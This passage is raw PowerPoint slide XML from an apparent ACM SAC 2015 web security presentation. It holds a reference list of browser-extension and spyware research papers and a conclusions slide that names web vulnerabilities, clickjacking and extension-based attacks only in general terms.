              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="285"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>A. Barth, A. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-75" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>P. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Felt, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-75" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>P. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Saxena, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>A. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Boodman, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“Protecting browsers </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>from extension </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>vulnerabilities,” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in NDSS,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2010.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="102235" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="290"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="286385" algn="l"/>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>E. Kirda, C. Kruegel, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>G. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Banks, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>G. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Vigna, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and R. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>A. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Kemmerer, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“Behavior‐based spyware </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>detection,” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Proceedings of  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>15th </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>conference </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>USENIX Security </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Symposium </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Volume </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>15, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ser. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>USENIX‐SS’06. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>SENIX </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Association,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-185" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2006.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="316230" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="285"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>S. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Bandhakavi, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>N. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Tiku, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-55" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>W. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Pittman, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>S. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-55" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>T. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>King, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-75" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>P. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Madhusudan, and M. Winslett, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“Vetting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>browser extensions for  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>security </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>vulnerabilities </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>vex,” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Commun. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ACM, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>vol. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>54, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pp. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>91–99, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Sep.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-130" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2011.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="385445" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="290"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>M. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-55" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>T. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Louw, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>J. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>S. Lim, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-70" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>V. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>N. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Venkatakrishnan, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“Enhancing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>browser </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>security against </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>malware </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>extensions,”  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Journal </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Computer </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Virology, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>vol. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>4, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>no. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>3, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pp. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>179–195,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2008.</a:t>
            </a:r>
            <a:endParaRPr sz="1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457962"/>
            <a:ext cx="9144000" cy="1028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56988" y="457200"/>
            <a:ext cx="4744212" cy="6004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57200" y="457200"/>
            <a:ext cx="9143999" cy="10271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036567" y="578611"/>
            <a:ext cx="1986914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10" dirty="0"/>
              <a:t>Conclusions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425"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>ACM SAC</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2015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6830">
              <a:lnSpc>
                <a:spcPts val="1425"/>
              </a:lnSpc>
            </a:pPr>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr dirty="0"/>
              <a:t>92</a:t>
            </a:fld>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993902" y="1322324"/>
            <a:ext cx="7476490" cy="3244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indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="93181"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-55" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-13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application</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-105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security</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-140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vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-120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exist</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-6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in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-70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real</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-80" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>world</a:t>
            </a:r>
            <a:endParaRPr sz="22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0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="5080" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="93181"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Each</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5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mitigation</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10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or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-11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testing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5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technique</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-80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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-45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important</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-12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and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-7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offers  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>unique</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-130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advantages</a:t>
            </a:r>
            <a:endParaRPr sz="22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Clr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="18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BD0D9"/>
              </a:buClr>
              <a:buSzPct val="93181"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Clickjacking </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>emerging</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-300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attack</a:t>
            </a:r>
            <a:endParaRPr sz="22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45"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="93181"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-55" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-75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browser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-15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extension</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-11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open</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-95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up</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-6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more</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-140" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>avenues</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-12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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-1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attacks</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia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Clr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="69215" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="93181"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
